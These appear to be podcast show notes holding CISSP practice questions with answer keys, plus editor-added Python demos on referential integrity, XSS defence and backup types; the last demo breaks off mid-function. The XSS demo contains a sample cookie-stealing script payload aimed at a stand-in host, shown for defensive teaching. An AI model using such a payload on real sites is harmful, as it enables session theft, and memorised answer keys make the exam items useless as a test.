Shon Gerber from ReduceCyberRisk.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon has over 19 years of experience in government and corporate cybersecurity providing you expertis…
Shon Gerber: CISO, Cyber Security Expert, and Online Entrepreneur
Subscribe: iTunes | Google Play | Stitcher Radio | RSS

Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity. Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions. His knowledge will provide the skills needed to pass the CISSP Exam.

BTW - Get access to all my Free Content and CISSP Training Courses here at: https://shongerber.com/

Available Courses:
CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB
CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o

CISSP Exam Questions

Question: 165
Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner?
A. Improved security kernel processes
B. Improved security perimeter processes
C. Improved application programming interface processes
D. Improved garbage collection processes
If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 166
Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes Steve’s confusion?
A. Certification must happen first before the evaluation process can begin.
B. Accreditation is the acceptance from management, which must take place before the evaluation process.
C. Evaluation, certification, and accreditation are carried out by different groups with different purposes.
D. Evaluation requirements include certification and accreditation components.
Evaluation, certification, and accreditation are carried out by different groups with different purposes. Evaluations are carried out by qualified third parties who use specific evaluation criteria (Orange Book, ITSEC, Common Criteria) to assign an assurance rating to a tested product. A certification process is a technical review commonly carried out internally to an organization, and accreditation is management’s formal acceptance that is carried out after the certification process. A system can be certified internally by a company and not pass an evaluation testing process because they are completely different things.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 167
Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classification levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following best describes one of the system requirements outlined in this scenario and how it should be implemented?
A. Data hiding should be implemented through memory deallocation.
B. Data hiding should be implemented through properly developed interfaces.
C. Data hiding should be implemented through a monolithic architecture.
D. Data hiding should be implemented through multiprogramming.
Data hiding means that certain functionality and/or data is “hidden,” or not available to specific processes. For processes to be able to interact with other processes and system services, they need to be developed with the necessary interfaces that restrict communication flows between processes. Data hiding is a protection mechanism that segregates trusted and untrusted processes from each other through the use of strict software interface design.
https://www.brainscape.com/subjects/cissp-domains

Want to find Shon elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
CISSP Exam Questions

Question: 168
Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classification levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following is a characteristic that this new system will need to implement?
A. Multiprogramming
B. Simple integrity axiom
C. Mandatory access control
D. Formal verification
Since the new system must achieve a rating of EAL 6, it must implement mandatory access control capabilities. This is an access control model that allows users with different clearances to be able to interact with a system that processes data of different classification levels in a secure manner. The rating of EAL 6 requires semiformally verified design and testing, whereas EAL 7 requires verified design and testing.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 169
Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classification levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following reasons best describes her boss’s suggestion on the kernel design of the new system?
A. Hardware layer abstraction for portability capability
B. Layered functionality structure
C. Reduced mode transition requirements
D. Central location of all critical operating system processes
A hybrid microkernel architecture means that all kernel processes work within kernel mode, which reduces the amount of mode transitions. The reduction of mode transitions reduces performance issues because the CPU does not have to change from user mode to kernel mode as many times during its operation.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 170
Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classification levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following is a required characteristic of the system Sarah’s team must build?
A. Multilevel security
B. Dedicated mode capability
C. Simple security rule
D. Clark-Wilson constructs
A multilevel security system allows for data at different classification levels to be processed and allows users with different clearance levels to interact with the system securely.
https://www.brainscape.com/subjects/cissp-domains

LINKS:
Online Article https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html
CISSP Exam Questions

Question: 162
John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of issue?
A. Application is written in the C programming language.
B. Application is not carrying out enforcement of the trusted computing base.
C. Application is running in ring 3 of a ring-based architecture.
D. Application is not interacting with the memory manager properly.
The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 163
Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection.
A. Non-protected ROM sections
B. Vulnerabilities that allowed malicious code to execute in protected memory sections
C. Lack of a predefined and implemented trusted computing base
D. Lack of a predefined and implemented security kernel
If testers suggested to the team that address space layout randomization and data execution protection should be integrated, this is most likely because the system allows for malicious code to easily execute in memory sections that would be dangerous to the system. These are both memory protection approaches.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 156
If a security mechanism offers availability, then it offers a high level of assurance that authorized subjects can _________ the data, objects, and resources.
A) Control
B) Audit
C) Access
D) Repudiate
Access
Accessibility of data, objects, and resources is the goal of availability. If a security mechanism offers availability, then it is highly likely that the data, objects, and resources are accessible to authorized subjects.
https://www.brainscape.com/subjects/cissp-domains
Shon will provide CISSP study and training for Domain 4 (Communication and Network Security) of the CISSP Exam.

CISSP Exam Questions

Question: 159
Vulnerabilities and risks are evaluated based on their threats against which of the following?
A) One or more of the CIA Triad principles
B) Data usefulness
C) Due care
D) Extent of liability
One or more of the CIA Triad principles
Vulnerabilities and risks are evaluated based on their threats against one or more of the CIA Triad principles.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 160
While performing a risk analysis, you identify a threat of fire and a vulnerability because there are no fire extinguishers. Based on this information, which of the following is a possible risk?
A) Virus infection
B) Damage to equipment
C) System malfunction
D) Unauthorized access to confidential information
Damage to equipment
The threat of a fire and the vulnerability of a lack of fire extinguishers lead to the risk of damage to equipment.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 161
What process or event is typically hosted by an organization and is targeted to groups of employees with similar job functions?
A) Education
B) Awareness
C) Training
D) Termination
Training
Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions.
https://www.brainscape.com/subjects/cissp-domains
CISSP Exam Questions

Question: 157
All but which of the following items require awareness for all individuals affected?
A) Restricting personal email
B) Recording phone conversations
C) Gathering information about surfing habits
D) The backup mechanism used to retain email messages
The backup mechanism used to retain email messages
Users should be aware that email messages are retained, but the backup mechanism used to perform this operation does not need to be disclosed to them.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 158
Which of the following statements is not true?
A) IT security can provide protection only against logical or technical attacks.
B) The process by which the goals of risk management are achieved is known as risk analysis.
C) Risks to an IT infrastructure are all computer based.
D) An asset is anything used in a business process or task.
Risks to an IT infrastructure are all computer based.
Risks to an IT infrastructure are not all computer based. In fact, many risks come from noncomputer sources. It is important to consider all possible risks when performing risk evaluation for an organization. If a company fails to properly evaluate and respond to all forms of risk, it remains vulnerable.
https://www.brainscape.com/subjects/cissp-domains
CISSP Exam Questions

Question: 153
Which commercial business/private sector data classification is used to control information about individuals within an organization?
A) Confidential
B) Private
C) Sensitive
D) Proprietary
Private
The commercial business/private sector data classification of private is used to protect information about individuals.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 154
Which of the following is not an element of the risk analysis process?
A) Analyzing an environment for risks
B) Creating a cost/benefit report for safeguards to present to upper management
C) Selecting appropriate safeguards and implementing them
D) Evaluating each threat event as to its likelihood of occurring and cost of the resulting damage
Selecting appropriate safeguards and implementing them
Risk analysis includes analyzing an environment for risks, evaluating each threat event as to its likelihood of occurring and the cost of the damage it would cause, assessing the cost of various countermeasures for each risk, and creating a cost/benefit report for safeguards to present to upper management. Selecting safeguards is a task of upper management based on the results of risk analysis. It is a task that falls under risk management, but it is not part of the risk analysis process.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 155
Which of the following is not a defense against collusion?
A) Separation of duties
B) Restricted job responsibilities
C) Group user accounts
D) Job rotation
Group user accounts
Group user accounts allow for multiple people to log in under a single user account. This allows collusion because it prevents individual accountability.
https://www.brainscape.com/subjects/cissp-domains
Shon will provide CISSP study and training for Domain 3 (Engineering Secure Design) of the CISSP Exam.

CISSP Exam Questions

Question: 150
How is the value of a safeguard to a company calculated?
A) ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard
B) ALE before safeguard * ARO of safeguard
C) ALE after implementing safeguard - annual cost of safeguard - controls gap
D) Total risk - controls gap
[A] ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard
The value of a safeguard to an organization is calculated by ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard [(ALE1 - ALE2) - ACS].
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 151
What is the primary objective of data classification schemes?
A) To control access to objects for authorized subjects
B) To formalize and stratify the process of securing data based on assigned labels of importance and sensitivity
C) To establish a transaction trail for auditing accountability
D) To manipulate access controls to provide for the most efficient means to grant or restrict functionality
[B] To formalize and stratify the process of securing data based on assigned labels of importance and sensitivity
The primary objective of data classification schemes is to formalize and stratify the process of securing data based on assigned labels of importance and sensitivity.
https://www.brainscape.com/subjects/cissp-domains

------------------------------------

Question: 152
What is the primary goal of change management?
A) Maintaining documentation
B) Keeping users informed of changes
C) Allowing rollback of failed changes
D) Preventing security compromises
Preventing security compromises
The prevention of security compromises is the primary goal of change management.
https://www.brainscape.com/subjects/cissp-domains
In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.

CISSP Exam Questions

Question: 144 To get proper management support and approval of the plan, a business case must be made. Which of the following is least important to this business case?
A. Regulatory and legal requirements
B. Company vulnerabilities to disasters and disruptions
C. How other companies are dealing with these issues
D. The impact the company can endure if a disaster hits

Answer: C. The other three answers are key components when building a business case. Although it is a good idea to investigate and learn about how other companies are dealing with similar issues, it is the least important of the four items listed.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 145 Which of the following describes a parallel test?
A. It is performed to ensure that operations performed at the alternate site also give the same results as at the primary site.
B. All departments receive a copy of the disaster recovery plan and walk through it.
C. Representatives from each department come together and go through the test collectively.
D. Normal operations are shut down.

Answer: A. In a parallel test, some systems are run at the alternate site, and the results are compared with how processing takes place at the primary site. This is to ensure that the systems work in that area and productivity is not affected. This also extends the previous test and allows the team to walk through the steps of setting up and configuring systems at the offsite facility.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 146 Which of the following describes a structured walk-through test?
A. It is performed to ensure that critical systems will run at the alternate site.
B. All departments receive a copy of the disaster recovery plan and walk through it.
C. Representatives from each department come together and review the steps of the test collectively without actually performing those steps.
D. Normal operations are shut down.

Answer: C. During a structured walk-through test, functional representatives review the plan to ensure its accuracy and that it correctly and accurately reflects the company's recovery strategy.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 147 When is the emergency actually over for a company?
A. When all people are safe and accounted for
B. When all operations and people are moved back into the primary site
C. When operations are safely moved to the offsite facility
D. When a civil official declares that all is safe

Answer: B. The emergency is not actually over until the company moves back into its primary site. The company is still vulnerable and at risk while it is operating in an altered or crippled state. This state of vulnerability is not over until the company is operating in the way it was prior to the disaster. Of course, this may mean that the primary site has to be totally rebuilt if it was destroyed.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925
In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.

CISSP Exam Questions

Question: 141 Who has the final approval of the business continuity plan?
A. The planning committee
B. Each representative of each department
C. Management
D. External authority

Answer: C. Management really has the final approval over everything within a company, including these plans.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 142 What is the most crucial requirement in developing a business continuity plan?
A. Business impact analysis
B. Implementation, testing, and following through
C. Participation from each and every department
D. Management support

Answer: D. Management's support is the first thing to obtain before putting any real effort into developing these plans. Without management's support, the effort will not receive the necessary attention, resources, funds, or enforcement.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 143 During development, testing, and maintenance of the continuity plan, a high degree of interaction and communication is crucial to the process. Why?
A. This is a regulatory requirement of the process.
B. The more people who talk about it and are involved, the more awareness will increase.
C. This is not crucial to the plan and should not be interactive because it will most likely affect operations.
D. Management will more likely support it.

Answer: B. Communication not only spreads awareness of these plans and their contents, but also allows more people to discuss the possible threats and solutions, which may lead to ideas that the original team did not consider.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925
In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.

CISSP Exam Questions

Question: 138 Which of the following is something that should be required of an offsite backup facility that stores backed-up media for companies?
A. The facility should be within 10 to 15 minutes of the original facility to ensure easy access.
B. The facility should contain all necessary PCs and servers and should have raised flooring.
C. The facility should be protected by an armed guard.
D. The facility should protect against unauthorized access and entry.

Answer: D. This question addresses a facility that is used to store backed-up data; it is not talking about an offsite facility used for disaster recovery purposes. The facility should not be only 10 to 15 minutes away, because some types of disasters could destroy both the company's main facility and this facility if they are that close together, in which case the company would lose all of its information. The facility should have the same security standards as the company's own, including protection against unauthorized access.
https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708

------------------------------------

Question: 139 Which item will a business impact analysis not identify?
A. Whether the company is best suited for a parallel or full-interrupt test
B. What areas would suffer the greatest operational and financial loss in the event of a particular disaster or disruption
C. What systems are critical for the company and must be highly protected
D. What amount of outage time a company can endure before it is permanently crippled

Answer: A. All the other answers address the main components of a business impact analysis. Determining the best type of exercise or drill to carry out is not covered under this type of analysis.
https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708

------------------------------------

Question: 140 Which areas of a company are recovery plans recommended for?
A. The most important operational and financial areas
B. The areas that house the critical systems
C. All areas
D. The areas that the company cannot survive without

Answer: C. It is best if every department within the company has its own contingency plan and procedures in place. These individual plans would "roll up" into the overall enterprise BCP.
https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708
In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.

CISSP Exam Questions

Question: 135 Which of the following contains references to expected business continuity planning (BCP) practices that organizations must implement?
A. ISO 17799:2008, Section 1
B. ISO 27005:2008, Section 8
C. ISO 27002:2005, Section 10
D. ISO 27001:2005, Annex A

Answer: D
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 136 What process identifies the business continuity requirements for the organization's assets?
A. risk analysis
B. business impact analysis
C. threat analysis
D. asset classification

Answer: B
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 137 A contingency plan should be written to
A. address all possible risk scenarios
B. address all likely risk scenarios
C. remediate all vulnerabilities
D. recover all operations

Answer: B
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925
In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.

CISSP Exam Questions

Question: 132 Which of the following is less likely to accompany a contingency plan, either within the plan itself or in the form of an appendix?
A. Contact information for all personnel
B. Vendor contract information, including offsite storage and alternate site
C. Equipment and system requirements lists of hardware, software, firmware, and other resources required to support system operations
D. The Business Impact Analysis

Answer: D
Explanation: You use the BIA as a guideline to create the contingency plan; it is an input to the plan rather than part of it.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 133 The first step in contingency planning is to perform:
A. A hardware backup
B. A data backup
C. An operating system software backup
D. An application software backup

Answer: B
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925

------------------------------------

Question: 134 Which of the following teams should not be included in an organization's contingency plan?
A. Damage assessment team
B. Hardware salvage team
C. Tiger team
D. Legal affairs team

Answer: C
Explanation: Tiger is the name of a cryptographic hash algorithm, and a "tiger team" is a penetration-testing team that attacks systems to find weaknesses; neither is a recovery team. The other three are standard contingency-plan teams. Excerpt is from CISSP / Shon Harris / 5th edition.
https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925
In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.

CISSP Exam Questions

Question: 129 Which of the following could lead to the conclusion that a disaster recovery plan may not be operational within the timeframe the business needs to recover?
A. The alternate site is a warm site
B. Critical recovery priority levels are not defined
C. Offsite backups are located away from the alternate site
D. The alternate site is located 70 miles away from the primary site

Answer: B

------------------------------------

Question: 130 What are the four domains of communication in the disaster planning and recovery process?
A. Plan manual, plan communication, primer for survival, warning and alarms
B. Plan communication, primer for survival, escalation, declaration
C. Plan manual, warning and alarm, declaration, primer for survival
D. Primer for survival, escalation, plan communication, warning and alarm

Answer: C

------------------------------------

Question: 131 The underlying reason for creating a disaster planning and recovery strategy is to
A. Mitigate risks associated with disaster.
B. Enable a business to continue functioning without impact.
C. Protect the organization's people, place and processes.
D. Minimize financial profile.

Answer: A
Explanation: "Disaster recovery has the goal of minimizing the effects of a disaster and taking the necessary steps to ensure that the resources, personnel, and business processes are able to resume operation in a timely manner." Pg 550, Shon Harris: All-in-One CISSP Certification

LINKS:
Online Article https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html
In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.

CISSP Exam Questions

Question: 128 In what type of software testing does the tester have access to the underlying source code?
A) Static testing
B) Dynamic testing
C) Cross-site scripting testing
D) Black box testing

Answer: A) Static testing. In order to conduct a static test, the tester must have access to the underlying source code.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 129 What portion of the change management process allows developers to prioritize tasks?
A) Release control
B) Configuration control
C) Request control
D) Change audit

Answer: C) Request control. Request control provides users with a framework to request changes and developers with the opportunity to prioritize those requests.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 130 Which one of the following key types is used to enforce referential integrity between database tables?
A) Candidate key
B) Primary key
C) Foreign key
D) Super key

Answer: C) Foreign key. Foreign keys are used to enforce referential integrity constraints between tables that participate in a relationship: a row in the child table may only reference a key value that exists in the parent table.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328
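To make "enforce referential integrity" in Question 130 concrete, here is an added example using Python's built-in sqlite3 module; it is editor-written and not code from the original episode or its Brainscape source. The users/sessions schema is constructed for the demonstration. The caveat it demonstrates is one practitioners trip over: SQLite accepts a FOREIGN KEY declaration but only enforces it when PRAGMA foreign_keys = ON is set on the connection, so the same schema behaves differently depending on that setting.

```python
import sqlite3

# Constructed schema for the demonstration: a session token must belong to
# a real user, and deleting the user must take the user's sessions with it.
SCHEMA = """
CREATE TABLE users (
    id   INTEGER PRIMARY KEY,
    name TEXT NOT NULL
);
CREATE TABLE sessions (
    token   TEXT PRIMARY KEY,
    user_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE
);
INSERT INTO users (id, name) VALUES (1, 'alice');
"""


def _connect(enforce: bool) -> sqlite3.Connection:
    """Open an in-memory database with the constraint enforcement chosen.

    The PRAGMA is per-connection in SQLite; a library that forgets it gets a
    schema that looks protected but is not.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(f"PRAGMA foreign_keys = {'ON' if enforce else 'OFF'}")
    conn.executescript(SCHEMA)
    return conn


def orphan_insert_rejected(enforce: bool) -> bool:
    """Try to create a session for a user id that does not exist.

    Returns True when the database rejects the orphan row (referential
    integrity enforced) and False when it silently accepts it.
    """
    conn = _connect(enforce)
    try:
        conn.execute("INSERT INTO sessions (token, user_id) VALUES ('tok-123', 999)")
        return False
    except sqlite3.IntegrityError:
        return True
    finally:
        conn.close()


def sessions_left_after_user_delete(enforce: bool) -> int:
    """Delete the only user and count the session rows left behind.

    With enforcement on, ON DELETE CASCADE removes the child rows, so no
    dangling token remains that could still be presented for a deleted account.
    """
    conn = _connect(enforce)
    try:
        conn.execute("INSERT INTO sessions (token, user_id) VALUES ('tok-abc', 1)")
        conn.execute("DELETE FROM users WHERE id = 1")
        (count,) = conn.execute("SELECT COUNT(*) FROM sessions").fetchone()
        return count
    finally:
        conn.close()


if __name__ == "__main__":
    for enforce in (False, True):
        print(f"foreign_keys={'ON' if enforce else 'OFF'}: "
              f"orphan rejected={orphan_insert_rejected(enforce)}, "
              f"sessions after user delete={sessions_left_after_user_delete(enforce)}")
```

Other engines (PostgreSQL, MySQL with InnoDB) enforce declared foreign keys by default; the point of the check is that the constraint only protects you when the engine is actually enforcing it, which is worth verifying rather than assuming.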
In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.

CISSP Exam Questions

Question: 125 What type of virus utilizes more than one propagation technique to maximize the number of penetrated systems?
A) Stealth virus
B) Companion virus
C) Polymorphic virus
D) Multipartite virus

Answer: D) Multipartite virus. Multipartite viruses use two or more propagation techniques (for example, file infection and boot sector infection) to maximize their reach.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 126 What programming language(s) can be used to develop ActiveX controls for use on an Internet site?
A) Visual Basic
B) C
C) Java
D) All of these are correct.

Answer: D) All of these are correct. Microsoft's ActiveX technology supports a number of programming languages, including Visual Basic, C, C++, and Java. On the other hand, only the Java language can be used to write Java applets.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 127 What transaction management principle ensures that two transactions do not interfere with each other as they operate on the same data?
A) Atomicity
B) Consistency
C) Isolation
D) Durability

Answer: C) Isolation. The isolation principle states that two transactions operating on the same data must be temporarily separated from each other such that one does not interfere with the other.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328
In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.

CISSP Exam Questions

Question: 122 What type of reconnaissance attack provides attackers with useful information about the services running on a system?
A) Session hijacking
B) Port scan
C) Dumpster diving
D) IP sweep

Answer: B) Port scan. Port scans reveal the ports associated with services running on a machine and available to the public.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 123 What technology does the Java language use to minimize the threat posed by applets?
A) Confidentiality
B) Encryption
C) Stealth
D) Sandbox

Answer: D) Sandbox. The Java sandbox isolates applets and allows them to run within a protected environment, limiting the effect they may have on the rest of the system.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328

------------------------------------

Question: 124 What is the most effective defense against cross-site scripting attacks?
A) Limiting account privileges
B) Input validation
C) User authentication
D) Encryption

Answer: B) Input validation. Input validation prevents cross-site scripting attacks by limiting user input to a predefined range. This prevents the attacker from including HTML <script> tags (or other active content) in the input that the application later reflects to a browser.
From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328
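Question 124 names input validation as the primary XSS defence. The following is an added example, written for this page and not taken from the original episode or its Brainscape source, that puts a vulnerable rendering function next to a hardened one. The hardened version combines an allowlist validator (the "predefined range" the explanation refers to) with HTML output encoding for the reflected value; it also shows encoding on its own for a free-text field where a tight allowlist is not possible. The display-name rules and the script payload are constructed for the demonstration.

```python
import html
import re

# Constructed attacker input: a cookie-stealing script tag.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Allowlist (assumption for this example): a display name is 1-32 letters,
# digits, spaces, dots, hyphens or underscores. Anything else is rejected.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,32}$")


def validate_display_name(value: str) -> bool:
    """Allowlist validation: True only if the value fits the expected range."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: untrusted input concatenated straight into markup."""
    return f"<p>Welcome, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Hardened: reject out-of-range input, then encode for the HTML text context.

    Validation stops the attack at the boundary; the html.escape() call is
    defence in depth so a later loosening of the allowlist cannot reintroduce
    injection on its own.
    """
    if not validate_display_name(name):
        raise ValueError("display name contains characters outside the allowed set")
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"


def render_comment(text: str) -> str:
    """Free text cannot be allowlisted as tightly, so contextual output
    encoding is the primary defence here: <, >, &, quotes become entities
    and the browser renders the payload as literal text."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


def contains_script_tag(markup: str) -> bool:
    """Crude probe used only to show whether the payload survived rendering."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe :", render_greeting_unsafe(PAYLOAD))
    print("valid? :", validate_display_name(PAYLOAD))
    print("safe   :", render_greeting_safe("Alice_01"))
    print("comment:", render_comment(PAYLOAD))
```

The allowlist is written for one field in one output context (HTML body text); a value that is later placed inside a JavaScript string, a URL or an HTML attribute needs the encoding appropriate to that context, and a blocklist of "bad" strings is not a substitute for either step.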
In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.

CISSP Exam Questions

Question: 119 What is considered a Computer Security Incident?
A) An earthquake hits your data center, rendering it unusable
B) A patch was implemented, resulting in a loss of a critical system
C) Local construction workers cut the fiber line that provides a network feed for your building
D) An employee violated the company's acceptable use policy by downloading pirated software

Explanation: [d] A violation of a company's acceptable use policy is considered a Computer Security Incident. The other options are disruptions that fit within the broad concept of an incident (and belong to availability and continuity planning), but they are not security incidents.

------------------------------------

Question: 120 What is the primary goal of a Change Management Process within an organization?
A) Provide good structure for making changes within a network
B) Avoid outages within your network
C) Provide documentation on all changes within a network
D) All the above

Explanation: [b] The primary goal of a Change Management Process is to avoid outages within your network environment. All of the above are important, but the primary goal is to avoid outages.

------------------------------------

Question: 121 Which of the following are considered strategic options for backups within a business environment?
A) Full Backup
B) Incremental Backup
C) Differential Backup
D) All the above

Explanation: [d] All of the above are considered strategic solutions for backups within a business environment. A full backup copies everything; an incremental backup copies what changed since the last backup of any type; a differential backup copies what changed since the last full backup.
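Question 121 lists full, incremental and differential backups as the three strategies. The following is an added example, written for this page and not code from the original episode, that simulates which files each type captures on each run and how many backup sets have to be restored afterwards. The file names and modification days are constructed for the demonstration; the selection rules are the standard ones (incremental: changed since the last backup of any kind; differential: changed since the last full).

```python
from __future__ import annotations
from dataclasses import dataclass, field


@dataclass
class Backup:
    kind: str            # "full", "incremental" or "differential"
    day: int             # the day the backup ran
    files: list = field(default_factory=list)   # paths captured on that run


class BackupSimulation:
    """Tracks file modification days and the backups taken against them."""

    def __init__(self) -> None:
        self.files: dict = {}      # path -> day it was last modified
        self.history: list = []    # Backup objects in chronological order

    def modify(self, path: str, day: int) -> None:
        self.files[path] = day

    def _last_day(self, kinds: tuple) -> int:
        days = [b.day for b in self.history if b.kind in kinds]
        if not days:
            raise RuntimeError("run a full backup before incremental/differential")
        return max(days)

    def run(self, kind: str, day: int) -> Backup:
        """Take a backup of `kind` at the end of `day` and record it."""
        if kind == "full":
            since = -1                                   # everything
        elif kind == "differential":
            since = self._last_day(("full",))            # changed since last full
        elif kind == "incremental":
            since = self._last_day(("full", "incremental", "differential"))
        else:
            raise ValueError(f"unknown backup type: {kind}")
        captured = sorted(p for p, mday in self.files.items() if since < mday <= day)
        backup = Backup(kind, day, captured)
        self.history.append(backup)
        return backup

    def restore_set(self) -> list:
        """Backups needed, in order, to rebuild the latest state.

        Always the last full; then the last differential (if any), which
        subsumes every incremental before it; then any incrementals taken
        after that differential.
        """
        full_idx = max(i for i, b in enumerate(self.history) if b.kind == "full")
        after_full = self.history[full_idx + 1:]
        needed = [self.history[full_idx]]
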